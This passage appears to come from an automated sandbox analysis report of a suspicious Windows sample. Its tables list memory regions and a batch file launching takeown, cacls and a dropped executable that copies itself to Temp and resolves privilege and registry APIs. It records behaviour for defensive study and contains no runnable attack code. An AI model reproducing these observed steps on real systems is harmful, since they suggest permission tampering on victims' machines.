| private_0x000000007f5fa000 | 0x7f5fa000 | 0x7f5fafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f5fd000 | 0x7f5fd000 | 0x7f5fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 98 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 77 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 35 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 136, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x35c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x4e0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xa2c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "publisherfunnydownloaded.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "publisherfunnydownloaded.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #184: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #184 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:11, Reason: Child Process |
| Unmonitor | End Time: 00:03:14, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x94c |
| Parent PID | 0x744 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
87C
0x
5D0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00997fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x00b20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x01f2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f30000 | 0x01f30000 | 0x0207ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
